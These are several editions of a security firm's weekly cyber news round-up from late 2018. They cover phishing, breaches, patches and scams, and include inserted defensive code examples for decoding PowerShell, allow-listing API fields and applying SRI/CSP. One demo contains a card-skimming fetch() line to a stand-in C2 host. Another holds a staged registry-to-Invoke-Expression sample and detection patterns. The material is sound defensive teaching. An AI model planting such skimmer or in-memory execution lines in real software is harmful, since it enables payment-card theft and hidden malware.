To prevent your computer systems and organisations from compromise, it is recommended that all systems not configured to auto-update have this update applied immediately.

Emotet Sends Unwanted Christmas Greetings

The Windows Defender Security Intelligence team have identified a number of holiday-themed greeting emails, reported via their Twitter feed. These emails distribute a variant of the destructive Emotet virus family using Office documents pretending to be Christmas greeting cards.

The team has witnessed a campaign from the Emotet gang with emails titled ‘Christmas email greetings’ that contain attached Word documents such as ‘Christmas-greeting-card.doc’ and ‘Christmas eCard.doc’. Each attachment includes the Emotet trojan payload, identified by MS as Trojan:Win32/Emotet.AC!.

Emotet started life some time back as a banking trojan but has since evolved to become a distributor of more malicious and destructive threats, such as network worms and wiper malware.

Look out for these malicious emails and ensure you have active anti-virus / anti-malware protection in place on all your computer systems, kept up to date at least daily, to protect against this threat. And as always, never open any email attachments unless you are certain they are from a trusted source.

Ironshare wish you all a very Merry Christmas and a Happy New Year.

Remember - always stay safe and secure.

And that’s it for this week, please don’t forget to tune in for our next instalment.

Edition #22 – 21st December 2018

By Stuart Hare on 20/12/18

Office 365 Phishing – Non-Delivery Notifications

Research carried out by the SANS ISC team has found a new phishing attack in the wild that targets Microsoft Office 365 users through the use of fake Non-Delivery Report (NDR) emails.

NDRs are sent to let you know that there has been an issue delivering an email you have sent, and provide information on why the delivery was unsuccessful.

This phishing email imitates a real Microsoft NDR in an attempt to steal the user's Office 365 login username and password.

Below is an image of a real NDR email from Microsoft:

Office 365 NDR

The image below shows what the fake NDR email looks like:

O365 Phishing email

At first glance this is very convincing and has the potential to trick most people who do not look more closely at the email. Clicking on the Send Again link redirects the user to a phishing website that mimics the Microsoft login page.

The image below shows the fake login page:

Office 365 phishing login site

If the user continues to enter their login details into this site, then the attacker has succeeded in stealing the credentials of the user's Office 365 account. This account should now be deemed compromised, and immediate action is required.

What do I do or look out for?

If you receive what you believe to be a fake email, look out for the following:

  • Check the sender email address; this can be an indication that it’s fake. Normally an NDR is sent by ‘Microsoft Outlook’.
  • Check your sent items to confirm whether you did try to send an email to the stated recipient.
  • ‘Send Again’ links and buttons are not normally contained in these NDR emails. Do not click on email links unless you are certain the sender is trusted.
  • If you do accidentally click on the link, or think that the link is genuine, check the address bar for the page and confirm it’s going to a Microsoft address.
  • If you are unsure never click on a link or enter your login details.
  • If you believe you have clicked on a link or entered your details into a phishing site, immediately change your password, and contact your Administrator / Security team ASAP to inform them of the issue. The earlier they know about the issue the more likely they can prevent significant damage or compromise.

What can I do to prevent this in the future?

User education on these types of phishing threats combined with good technology controls can help to prevent these types of attacks from impacting your business.

  • Enabling two-factor authentication for your Office 365 user accounts (using the Authenticator smartphone app) can help prevent unauthorised access to accounts when usernames and passwords are stolen.
  • The Cisco Umbrella Secure Internet Gateway can prevent access to fake phishing sites that attempt to steal user’s login details, when users are tricked into clicking fake phishing email links.
  • Email security products, such as Cisco Email Security can help prevent phishing emails from reaching your users.

Ironshare – Security Simplified

By Stuart Hare on 13/12/18

Cyber Round-up for 14th December

Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views and highlights from the world of Security.

UK Businesses Seek Greater Cyber Support from Government

A recent survey commissioned by RedSeal found that business in the UK is generally feeling let down by the Government when it comes to cyber security.

The research took place during November 2018 and sought the insight of over 500 UK IT professionals at Director level and above. This research revealed some key concerns for UK businesses:

  • 68% of those surveyed had suffered a security incident in the last year;
  • 1 in 5 stated that they had no defined response plans to deal with a cyberattack;
  • 65% claimed that senior management or board members had little involvement with cyber security;
  • a third of the survey participants felt that Her Majesty’s Government did not provide UK business with enough guidance or support on matters of cyber security.

These numbers provide more evidence that UK business is not doing enough to protect itself when it comes to cyber and information security. We see a new headline in the news every week highlighting another data breach or cyberattack that results in huge costs and implications for the companies involved.

Business owners and senior managers, for organisations large or small, need to understand the importance of having a strong security strategy that’s aligned and proportionate to their overall business objectives.

The National Cyber Security Centre (NCSC), a division of the UK intelligence service GCHQ, was established by HMG in 2016 to provide such support for public and private sector organisations, as well as critical national infrastructure.

Although the NCSC has made great steps forward in providing simple advice and guidance to help protect the UK from cyberattack, it is clear through this survey, and our engagement with small to medium businesses, that more needs to be done, as the large majority still do not know about the NCSC or what it offers.

We believe that the NCSC are on the right track, but it seems they still have some way to go before they become a household name and truly have a positive impact in helping to secure the UK and its businesses.

New Office 365 Phishing Emails on the Loose

Research carried out by the SANS ISC team has found a new phishing attack in the wild that targets Microsoft Office 365 users through fake Non-Delivery Report (NDR) emails.

We have witnessed many phishing emails in the last year related to Office 365, but so far none that look this convincing, and none that have used this NDR method.

Check out our short blog on this phishing threat, which includes what to do, what to look for and how to prevent this threat from compromising your Office 365 service: https://www.ironshare.co.uk/security-advisory/office-365-phishing-non-delivery-notifications/

MS Patch Tuesday – December 18

Tuesday 11th December saw the release of Microsoft’s scheduled monthly security updates. Included in this month’s release were a total of 9 Critical and 29 Important security updates.

The release covers updates in Windows, Office products, the Internet Explorer and Edge browsers, the .NET Framework and the Chakra scripting engine.

5 of the 9 Critical vulns relate to memory corruption issues in the Chakra scripting engine, and how objects are handled in the memory of the Edge browser. These can be exploited by tricking a user into visiting a specially crafted web page, allowing the attacker to run remote code on the victim’s machine.

A critical remote code execution vulnerability also exists in the Windows DNS Server component when it fails to handle DNS requests properly. By sending malicious requests, an attacker can exploit this vuln and run arbitrary code under the Local System account on Windows servers (2012 and later) that are configured with the DNS Server feature.

Rounding out the critical updates are memory corruption vulns in the Internet Explorer and Edge browsers, and a remote code injection vuln in the .NET Framework that can lead to an attacker hijacking an affected system.

Staying up to date with security patches for your operating systems and software is a critical part of delivering and maintaining a strong security posture; please ensure you test and update as quickly as possible to prevent exploitation and stay secure.

The December Patch Tuesday release notes can be found here, while the Security Guidance and CVEs can be found here.

Critical Vulnerabilities in Adobe Acrobat Reader

Adobe have released a security bulletin for a number of critical and important vulnerabilities in Acrobat Reader that were discovered by research teams at Cisco Talos, Trend Micro and Palo Alto Networks.

Adobe Acrobat Reader stands as the most popular PDF reader in use today and is an integrated part of common web browsers such as Google Chrome and Microsoft Edge.

When exploited, these vulnerabilities can allow an attacker to launch malicious code execution in the context of the logged-in user.

Security updates are available for the affected products on both Windows and macOS. Updates should be performed automatically by the product in most situations, but please verify these have completed, especially in enterprise environments where direct internet access is not permitted and auto-updates may not complete successfully.

Stay Safe when Christmas Shopping

Our final message for this week continues to spread the word of staying clear of scams and fake purchases while shopping online for those coveted Christmas gifts. With one in five people being scammed when buying Christmas presents online, we expect to see another increase this year, which could eclipse the £11 million online fraud of Christmas 2017.

Check out our previous round-up posts of the 23rd November and 30th November, where we discussed the pitfalls of Holiday Season scams and what to look out for.

Please be aware of the heightened threat of fraudulent activity during the weeks before, and directly after, Christmas, and follow the advice provided by Action Fraud and our previous posts above.

Remember that if the deal looks too good to be true, it’s likely to be fake.

If you have been a victim of fraud, it is important to ensure that you report it to Action Fraud either online or by calling 0300 123 2040. #fightfestivefraud

And that’s it for this week, please don’t forget to tune in for our next instalment.

Edition #21 – 14th December 2018

By Stuart Hare on 13/12/18

Cyber Round-up for 7th December

Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views and highlights from the world of Security.

Big Breaches in the Last Week

We have seen more big data breaches in the last week, starting with the Marriott Starwood hotel chain that hit the news on Friday. With up to half a billion customers impacted, this stands as one of the largest breaches of personal information we have seen to date.

Marriott posted a notification on its news center website stating that an ongoing security investigation had determined that the Starwood properties customer database had been accessed by an unauthorised party. Worryingly, they found this unauthorised access had been in place for approximately 4 years, and during this time the actors had managed to both copy and encrypt data in order to extract it from the company’s network.

The leaked personal information included names, addresses, email addresses, passport numbers, arrival and departure info, as well as credit card information.

Marriott are working with law enforcement, and on a rolling basis are contacting customers that may be affected by the breach. A dedicated website has been set up to address questions that customers may have: https://info.starwoodhotels.com/

Following this were reports that the Q&A website Quora suffered a similar incident that has resulted in the compromise of personal information for approximately 100 million users.

Unauthorised access to one of their systems was gained by a malicious third party, with the possibility that they have managed to access all user account information, public and non-public content, and the users' encrypted passwords.

Quora are contacting affected users by email, while also providing an FAQ help page to answer questions in more detail.

If you believe you are affected by the breaches above: check your email for direct information from the company; contact your bank or credit card company to inform them and seek guidance on replacing your cards; and as a precaution replace your passwords for these sites, and any sites where you may have used the same email and password combination. Importantly, if you have used the same password elsewhere, make sure you change those too, and remember: never use the same password twice.

Fight Festive Fraud

Staying with the Holiday Season theme of our last posts, we continue to spread the word about protecting yourselves online during the festive period. We kick-started this with our previous round-up posts of the 23rd November and 30th November, where we discussed the pitfalls of Holiday Season scams and what to look out for.

On the basis that any one of us could fall victim, Action Fraud in the UK, in conjunction with the City of London Police, have launched the Fight Festive Fraud campaign to educate the public about the perils of online shopping fraud.

Action Fraud report that during the 2017 Christmas period over 15,000 shoppers were conned by fraudsters to the sum of approx. £11 million. Deals on electronics such as mobile phones and computer devices continue to be the most profitable for the fraudsters.

Please be aware of the heightened threat of fraudulent activity during the weeks before, and directly after, Christmas, and follow the advice provided by Action Fraud and our previous posts above.

Remember that if the deal looks too good to be true, it’s likely to be fake.

If you have been a victim of fraud, it is important to ensure that you report it to Action Fraud either online or by calling 0300 123 2040.

New APT Attack uses Flash Zero-day

The 360 Threat Intelligence Team have released a technical post on newly discovered APT attacks that take advantage of a zero-day vulnerability in Adobe Flash to compromise the victim. The attacks use malicious Word documents embedded with the 0-day exploit, infecting the target system by deploying a Remote Access Trojan (RAT) that can be used to gain access to and control the compromised target.

The Word document is sent to the victim as an email attachment which, when downloaded, executes the exploit code and deploys the RAT, before registering with the Command and Control service.

Once installed, the RAT uses stealth techniques by pretending to be a valid Nvidia graphics card or Microsoft OneDrive program, but investigation into the executables shows that the digital signatures have been revoked and are therefore not valid.

Adobe have released a patch for this vulnerability that can be downloaded from their website.

Users should always look to keep their software and operating systems up to date with the latest versions / patches, and NEVER click on attachments unless they are expected and from a trusted source.

The Continued Rise of Fileless Malware

Cyber criminals are continually evolving their techniques, tactics and procedures to ensure that attacks gain increased levels of success while avoiding detection for as long as they can. Coupled with the realisation that the longer they remain undetected on a compromised device, the more profit they gain, this has driven the need for continuous improvement and change.

Fileless malware, although not new, has become a key malicious component in not only avoiding detection but also maintaining persistence on an infected device. Unlike file-based malware, fileless attacks do not have to touch the disk, allowing them to avoid detection by traditional security defences such as signature-based anti-virus.

A report by Malwarebytes Labs estimates that attacks using fileless malware have accounted for approximately 35% of all attacks in 2018, and that they are almost 10 times more likely to be successful in comparison to file-based attacks.

Many threats in the wild are currently using these advanced techniques, including the notorious Emotet banking trojan botnet and the ransomware variants SamSam and Sorebrect, all causing major damage around the globe. While Sorebrect is completely fileless, the others use fileless techniques to maintain post-infection persistence or perform malware dropper functions.

Common fileless techniques include the use of PowerShell to launch administrative scripts on the infected system. Such PowerShell commands can be masked using Base64 encoding and hidden in the registry, to be run later in memory.

If you are worried about the threat of fileless malware compromising your company infrastructure, then you should really consider an advanced malware solution such as Cisco AMP for Endpoints to defend against this threat.
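An added example (not from the Malwarebytes report or Ironshare's own tooling) of how a defender unmasks the Base64-encoded PowerShell described above: decode the -EncodedCommand argument from a logged process command line and look for the registry-read and in-memory-execution pattern the post describes. The command lines, the staged script under a hypothetical HKCU:\Software\Example key, the parameter spellings recognised and the indicator patterns are all constructed for the illustration.

```python
"""Decode Base64-masked PowerShell from process command lines so that an analyst
or a detection rule can read what actually ran.

Added example; the log lines, the hypothetical registry key, the accepted
parameter spellings and the indicator patterns are constructed for illustration."""
import base64
import binascii
import re

# powershell.exe accepts -EncodedCommand and its unambiguous prefixes; the set here is an assumption.
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Constructed indicator patterns for the behaviour the post describes:
# a payload fetched from the registry and run in memory.
INDICATORS = {
    "registry-read": re.compile(r"(?i)get-itemproperty|\bhk(?:cu|lm):"),
    "in-memory-exec": re.compile(r"(?i)invoke-expression|\biex\b"),
}


def encode_ps(command: str) -> str:
    """Encode exactly as PowerShell expects: UTF-16LE, then Base64 (used here to build the sample)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded script from a command line, or None if no valid payload is present."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # an encoded flag with junk after it is still worth a look, so analyse() keeps the flag


def analyse(command_line: str) -> dict:
    """Classify one process command line: was it encoded, what it decoded to, which indicators fire."""
    decoded = decode_encoded_command(command_line)
    encoded = ENCODED_ARG.search(command_line) is not None
    # Match indicators against the decoded script when we have one, else the raw command line.
    text = decoded if decoded is not None else command_line
    hits = sorted(name for name, pattern in INDICATORS.items() if pattern.search(text))
    return {"encoded": encoded, "decoded": decoded, "indicators": hits}


# Constructed sample: a script that pulls a stored blob from a hypothetical registry key and runs it in memory.
STAGED_SCRIPT = "Invoke-Expression (Get-ItemProperty 'HKCU:\\Software\\Example').Script"

# Constructed process-creation command lines: one masked, one ordinary admin script, one malformed.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -EncodedCommand " + encode_ps(STAGED_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -enc not-valid-base64!!",
]


def triage(command_lines) -> list:
    """Analyse a batch of command lines in order."""
    return [analyse(line) for line in command_lines]


if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        print(result)
```

Feed it the CommandLine field from process-creation events (Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled); the decoded text is what you want in the alert, not the Base64 blob.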

BT Kicks Huawei from 5G Network

For some time now there has been talk around the security concerns of having Chinese products in the core of western national infrastructure or sensitive networks. These concerns have been based upon the likelihood that products may have been modified for the benefit of the Chinese government, to assist in acts of espionage or state-sponsored cyber attacks.

BT have confirmed that equipment made by Chinese tech firm Huawei will not be used in the core infrastructure of the new 5G mobile network. In addition to this, they have also stated that all Huawei kit will be removed from the existing 3G and 4G networks.

BT have had a long relationship with Huawei dating back to 2005, and although this decision not to use their core network products has been made, BT will continue to work with Huawei for antennas and other non-critical devices.

This follows similar moves by the US, Australia and New Zealand governments to restrict Huawei from their 5G networks, on top of the mounting pressure from UK intelligence services for a decision to be made on whether the UK will continue to use, and trust, Chinese-owned technologies.

https://www.bbc.co.uk/news/technology-46453425

And that’s it for this week, please don’t forget to tune in for our next instalment.

Edition #20 – 7th December 2018

By Stuart Hare on 6/12/18

Cyber Round-up for 30th November

Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views and highlights from the world of Security.

Holiday Season Attacks on the Rise

Following on from last week's round-up, where we warned about the increased threat of online shopping scams, Carbon Black have released a Holiday Threat Report on this year's expected rise in cyber attacks.

According to the report, the Carbon Black Threat Analysis Unit (TAU) are expecting to see an increase of up to 60% in attempted cyber attacks in the run-up to and during this year’s festive period. This increase is based on the intelligence gathered from their platform of 16 million protected endpoints, which saw a 20% increase in 2016 and a 57% increase in attempted attacks in 2017.

Analysis for 2017 shows a steady increase in attacks between Black Friday and Christmas Day, with the peak number of attacks occurring between Christmas Day and New Year's Day, coinciding with the post-Christmas / Boxing Day shopping sales.

Shoppers are not the only target during this time of year though; businesses are equally in the crosshairs of attackers, who look to take advantage of them during this very busy period, when they are likely to be overworked, understaffed or both.

General email phishing attacks, along with more targeted spear-phishing attacks, remain the most common delivery of malware that leads to a successful compromise.

Remember to always keep an eye out for fake emails; look for spelling and grammatical errors; never click on a link or download an attachment unless you know for certain it’s from a trusted source; and if you receive an email from a company manager or director asking you to do something unusual, then ensure you follow up with them in person or via phone to confirm it’s not a scam.

BBC Reporter Targeted by Sextortion Scam

There have been a lot of press reports recently on the growing rate of sextortion scams currently doing the rounds.

Sextortion scams try to convince the victim that they have been recorded while visiting adult websites, and demand a ransom to prevent the attacker from sharing the footage with friends and family.

BBC reporter Jo Whalley became a target, and although she knew that this must be a scam, she was surprised to find her real password provided by the scammers.

The video report on her investigation (linked below) provides a good summary of the scam, and of how to check whether your password has been leaked using Troy Hunt’s ‘Have I Been Pwned?’ service.

https://www.bbc.co.uk/news/av/stories-46323625/what-happened-when-sextortion-scammers-targeted-a-bbc-trending-reporter

York City Council App Blunder

Last week a vulnerability was disclosed in the One Planet York mobile application, that leaked the personal details of approximately 6,000 York residents. The One Planet York app, run by the York City Council, gave users information and advice on the local recycling and bin collection services.

A security researcher at RapidSpike found that when simply accessing the Leaderboard feature on the app, the API that powers the feature pushed the personal data of the current Top Ten users directly to the app in plain text (unencrypted and readable).

The pushed data included names, addresses, emails, phone numbers, the user's hashed password and the salt (a random piece of data used to increase the security of stored passwords). So far all very bad.

York Council worked with the application developers, quickly removing the app and its associated servers to prevent further data leakage. It has since been decided that the app will not be reintroduced, and users were advised to remove the app from their devices.

This week the situation took a dark turn when the City of York Council reported the unnamed RapidSpike researcher to the police, claiming that they were not responsive, and that it appeared to them that deliberate unauthorised access was used to determine the data leak.

RapidSpike have since responded with a post of their own, standing by the researcher, who not only followed the Council's own responsible disclosure guidelines to inform them of the issue, but also responded within 18 mins of receiving an email from the Council.

An important point is that the researcher only had to access the Leaderboard feature and view the response to access the data, meaning no vulnerabilities were exploited.

This is always a possible risk when it comes to security research, and a scary position for the researcher who did the right thing by privately reporting the leak.

A huge positive was the support from the North Yorkshire Police Cyber Crime unit who responded via their Twitter account: “We are aware of the York 'data breach' but please be reassured we don't regard this incident as criminal. We recognise the benefits of software vuln disclosure as part of a healthy security environment and the researcher has acted correctly.”
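
The leaderboard leak above comes down to an API serialising whole user records straight from storage rather than an explicit public projection. The Python below is an added illustration, not code from One Planet York, RapidSpike or Ironshare: it contrasts the leaky pattern with an allow-list of public fields, and adds a test-time check that scans any response body for sensitive field names so that a new PII column cannot quietly start leaking later. The user records, field names and marker list are all constructed for the example.

```python
"""Field allow-listing for a public API response (added example)."""
import json

# Constructed sample of what a full user record in a backing store might
# hold. Only display_name and points belong in a public leaderboard.
USERS = [
    {"display_name": "alice", "points": 420, "full_name": "Alice Example",
     "email": "alice@example.invalid", "phone": "+44 0000 000000",
     "password_hash": "<constructed hash>", "salt": "<constructed salt>"},
    {"display_name": "bob", "points": 380, "full_name": "Bob Example",
     "email": "bob@example.invalid", "phone": "+44 0000 000001",
     "password_hash": "<constructed hash>", "salt": "<constructed salt>"},
]


def leaderboard_leaky(users, top_n=10):
    """The vulnerable pattern: serialise the whole stored record."""
    ranked = sorted(users, key=lambda u: u["points"], reverse=True)[:top_n]
    return json.dumps(ranked)


# The hardened pattern: an explicit allow-list. Fields added to the storage
# model later are excluded by default instead of leaked by default.
PUBLIC_FIELDS = ("display_name", "points")


def leaderboard_public(users, top_n=10):
    """Return only the allow-listed fields for the top entries."""
    ranked = sorted(users, key=lambda u: u["points"], reverse=True)[:top_n]
    return json.dumps([{k: u[k] for k in PUBLIC_FIELDS} for u in ranked])


# Constructed list of substrings that must never appear as a key in any
# public response body, whichever endpoint produced it.
SENSITIVE_MARKERS = ("password", "salt", "email", "phone", "full_name")


def leaked_fields(body):
    """Return the sorted sensitive key names found anywhere in a JSON body."""
    found = set()

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if any(marker in key.lower() for marker in SENSITIVE_MARKERS):
                    found.add(key)
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(json.loads(body))
    return sorted(found)


if __name__ == "__main__":
    print("leaky response leaks:", leaked_fields(leaderboard_leaky(USERS)))
    print("public response leaks:", leaked_fields(leaderboard_public(USERS)))
```

Running `leaked_fields` over every public endpoint's sample response in a CI job is the cheap version of the check the researcher performed by hand: it fails the build the moment a credential hash or contact detail appears in a body that should only carry a display name and a score.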

Talos DNSpionage

The latest blog post from the Talos Intelligence team covers a newly discovered campaign that’s been in operation across Lebanon and the UAE, which to date has targeted government domains and a private Lebanese airline.

As it stands Talos believe this is a new actor or group, that is using fake malicious websites advertising job opportunities to compromise its targets. The malware uses macro-embedded Office documents to deliver its payload, requiring the human victim to enable macros for the exploit to be deployed.

The malware dropped contains a Remote Administration Tool (RAT) and DNS capabilities for redirecting DNS traffic as well as tunnelling Command & Control traffic over DNS channels.

The DNS redirection attack has resulted in multiple public sector name servers being compromised, with the attackers repointing hostnames to IP addresses they control, in order to gain information such as email or VPN credentials.

In summary this appears to be a new advanced threat actor or group, focused on hitting important targets. Organisations should ensure that they have strong protection in place to defend against this and similar threats. Cisco's Umbrella and AMP for Endpoints security products provide the ideal protection against this type of threat.

The link below contains the full detailed technical information of the campaign including IOCs:

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

And that’s it for this week, please don’t forget to tune in for our next instalment.

Sign Up

To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailList

You can also follow us using the social media links provided.

If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReview

Ironshare – Security Simplified

Edition #19 – 30th November 2018

By

Stuart Hare

on

29/11/18

Cyber Round-up

Cyber Round-up for 23rd November


Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

Holiday Season Shopping Scams

The holiday season has officially kicked off, and these days it all starts with Thanksgiving Day in the US. The online shopping frenzy begins with the Black Friday sales, runs through Christmas and typically concludes in the New Year at the end of the Boxing Day sales (or it does in the UK at least).

With the increase in online spend comes the inevitable online shopping scams that try to steal your personal information and credit card details. As more and more people seek out the ultimate shopping deal, it is easy to lose focus and fall foul of one of these scams that promise the best deal or biggest discounts on products.

Black Friday sales started at the end of last week in the UK, and by the weekend we had already seen several scams hitting social media. Be aware that these scams can be delivered using a number of different methods, including email, fake web pages, fake Facebook posts and pages, fake smartphone apps, hoax coupons and gift cards, and WhatsApp / SMS messaging campaigns.

Email phishing and spam campaigns remain the biggest source of Cyber threats today, and this is no different here. Talos Intelligence report that last year, 71% of emails that included references to Black Friday and the following Cyber Monday sales were classified as spam.

Messaging platforms such as WhatsApp are also not immune. One such scam that has been circulating advertises huge discounts of up to 99% with Amazon but redirects its victims to a fake page in order to steal their information.

As always please stay vigilant, especially through this heightened period. Below are a few pointers to try and stay safe:

  • Do not click on links from untrusted sources that may appear in emails, messages, posts, or web pages.
  • Be extra cautious when advertised deals look too good to be true.
  • Watch out for links that send you to addresses not associated with the company being advertised, e.g. http://rebrand.ly instead of https://amazon.com or https://amazon.co.uk.
  • Look for spelling or grammatical errors in the scams and their associated links.
  • Always use complex passwords that are different for each site.
  • Where available enable Two factor authentication / Two-step verification on your accounts.
  • IF IN DOUBT never click a link, enter your personal details or login credentials.
  • If you think you may have already been the victim of a scam, immediately change your password and contact the site's fraud department to report the possible account breach.

Stay safe and Happy shopping.

Amazon Customer Information Leak

Amazon have been contacting certain customers in the US and UK this week, informing them of a technical error on the website that has leaked their name and email address.

    Hello,

    We’re contacting you to let you know that our website inadvertently disclosed your name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.

    Sincerely,

    Customer Service

    http://Amazon.com

First impressions of the customers receiving this email (shown above) were that it was suspicious, looking potentially like a bad phishing email that was essentially missing a link to the phishing site. The email content is very brief and provides no real information about what has occurred. Even Amazon’s own customer service department, when contacted, thought this was a phishing attempt.

After some digging it was found that this is in fact a real email from Amazon. Amazon themselves have confirmed the leak, reporting that the issue has been resolved and that all customers impacted by this information disclosure have been contacted.

According to Amazon this is not the result of a customer’s actions, and there is no need to change your password if you were a customer that was impacted.

Amazon need to take a close look at their notification process to ensure that future emails do not look like just another scam.

Data Breach at Vision Direct

Magecart has struck again, this time attacking the website of Vision Direct, an online provider of contact lenses. The attack has resulted in the loss of data for any users that created accounts, logged in or made payments on VisionDirect.co.uk between the 3rd and 8th November 2018.

Stolen data included both personal and credit card information that was entered during updates to accounts or when completing online purchases. Unfortunately, full credit card information including CVV numbers for Visa, Mastercard and Maestro cardholders will have been compromised.

Magecart works by embedding a third-party JavaScript into the web pages of the compromised site; it collects input data from online forms, which is then siphoned off to a remote Command and Control (C2) server.

As this is a real-time capture of information, any existing information that was stored in the Vision Direct database will not have been compromised. Vision Direct have confirmed that the incident has since been resolved, and they are contacting those customers impacted by this issue directly.

If you believe you have been affected by this breach, you should reset your account password and report it to your credit card provider, so your cards can be cancelled and replaced.

A Tripwire blog post recently stated that 20% of online stores compromised by Magecart are likely to be re-infected within days of cleaning up the previous infection, with one store reportedly being infected up to 18 times.

If you are running an online payment site, you should seriously consider running Content Security Policy (CSP) and Subresource Integrity (SRI) to control the scripts that run on your website, in order to prevent untrusted scripts from being injected. For more information Scott Helme has some excellent technical blog posts on this subject.

Link to Vision Direct Data Theft notification: https://www.visiondirect.co.uk/customer-data-theft
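
Because a Magecart skimmer lives in a script the page loads, both controls recommended above work by pinning what the browser is allowed to execute and where it may send data. The Python below is an added example, not Vision Direct's code and not taken from Scott Helme's posts: it computes SRI integrity values for a script you have reviewed, shows that a tampered copy of that script no longer matches (so the browser refuses to run it), and composes a CSP header that allows scripts and outbound connections only to an explicit host list. The script bodies, CDN and C2 host names are constructed for the example.

```python
"""Subresource Integrity (SRI) and Content Security Policy (CSP) helpers (added example)."""
import base64
import hashlib

# Constructed: the third-party checkout script you reviewed, and the same
# script with a skimmer line appended by a compromised supplier or CDN.
GENUINE_SCRIPT = b"window.checkout = function (form) { /* real code */ };\n"
TAMPERED_SCRIPT = GENUINE_SCRIPT + (
    b"fetch('https://c2.example.invalid/?d=' + document.forms[0].card.value);\n")

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")  # the only digests SRI permits


def sri_hash(body, algo="sha384"):
    """Return an SRI integrity value, e.g. 'sha384-<base64 digest>', for a script body."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI only permits sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src, body):
    """Build a <script> tag pinned to the exact body that was reviewed."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


def sri_matches(integrity, fetched):
    """Mimic the browser's load-time check: recompute and compare the digest.

    On mismatch a real browser never executes the script, so a skimmer
    injected upstream is blocked even though the page itself is untouched.
    """
    algo, _, expected = integrity.partition("-")
    if not expected or algo not in SRI_ALGORITHMS:
        return False
    return sri_hash(fetched, algo) == integrity


def csp_header(script_hosts, report_uri=None):
    """Compose a CSP that permits scripts only from an explicit allow-list.

    'self' covers first-party scripts; there is no 'unsafe-inline', so an
    injected inline skimmer is refused too. connect-src limits where the
    page may send form data, which is the skimmer's exfiltration path.
    """
    hosts = " ".join(script_hosts)
    policy = (f"default-src 'self'; script-src 'self' {hosts}; "
              f"connect-src 'self' {hosts}; object-src 'none'; base-uri 'self'")
    if report_uri:
        policy += f"; report-uri {report_uri}"
    return policy


if __name__ == "__main__":
    tag = script_tag("https://cdn.example.invalid/checkout.js", GENUINE_SCRIPT)
    print(tag)
    integrity = sri_hash(GENUINE_SCRIPT)
    print("genuine body loads:", sri_matches(integrity, GENUINE_SCRIPT))
    print("tampered body loads:", sri_matches(integrity, TAMPERED_SCRIPT))
    print("Content-Security-Policy:", csp_header(["https://cdn.example.invalid"],
                                                 report_uri="/csp-report"))
```

Note the trade-off the example makes visible: SRI pins a script to one exact body, so a legitimate supplier update changes the digest and the tag must be regenerated at deployment time. That is a feature for a payment page, where a silent script change is precisely the event you want to fail loudly, and a CSP `report-uri` gives you the telemetry when it does.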

Dark Web Hosting Provider Hacked

It seems that not even Dark Web sites are immune from hacking these days. A popular Dark Web hosting provider, Daniel’s Hosting, has been crippled by an attack, taking down the entire service which hosted more than 6,500 websites.

The hack reportedly took place on the 15th November, where a malicious actor got access to the backend database and deleted all accounts, including the root account. As this service was responsible for hosting nefarious websites such as malware operations, command and control services etc., it is a matter of opinion whether this act was a good or bad thing.

Daniel Winzen, the guy responsible for running what was the largest hosting service on the Dark Web, has stated that all data for the hosted sites is now lost, and that he might re-enable the service once the vulnerability has been identified and resolved.

It is not yet clear what vulnerabilities may have been exploited to accomplish this attack, but a zero-day PHP vulnerability, which gained attention the day before, could have been a candidate.

This is not the first time a Dark Web hosting service has been the victim of a take down. In 2017 the hacktivists Anonymous took down the Freedom Hosting II service.

https://www.zdnet.com/article/popular-dark-web-hosting-provider-got-hacked-6500-sites-down/

And that’s it for this week, please don’t forget to tune in for our next instalment.

Ironshare – Security Simplified

Edition #18 – 23rd November 2018

By

Stuart Hare

on

22/11/18

Cyber Round-up

Cyber Round-up for 16th November


Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

Cryptocurrency Scams

Over the last few weeks, an increasing number of cryptocurrency scams have been seen on the Twitter social media platform, using numerous compromised accounts. These scams try to trick users into handing over a small amount of cryptocurrency (such as Bitcoin), to receive a much larger amount of the currency in return, but all this does is fill the scammers' wallets and fund further campaigns.

Scammers are compromising Twitter verified accounts that are then used to deliver these scam tweets. The concern here is that Twitter accounts with the Verified (blue & white tick) badge are supposed to provide an element of trust, as the badge is displayed to indicate that the account has gone through Twitter’s approval process to ensure that the account is authentic.

We first witnessed this when a promoted 'Ad' tweet from Elon Musk told the community that he was giving away 10,000 Bitcoin. A closer look at the account confirmed this was actually the verified account of film studio Pathe UK, and the display name and image had been changed to make it look like it was coming from Elon Musk. To really sell it they even retweeted genuine tweets from Elon Musk’s real account.

This has not been the only instance of this scam; UK retailer Matalan and Google’s G Suite have also had their accounts compromised, and this week we saw Target become the latest victim when their account was briefly hijacked. @Target tweeted:

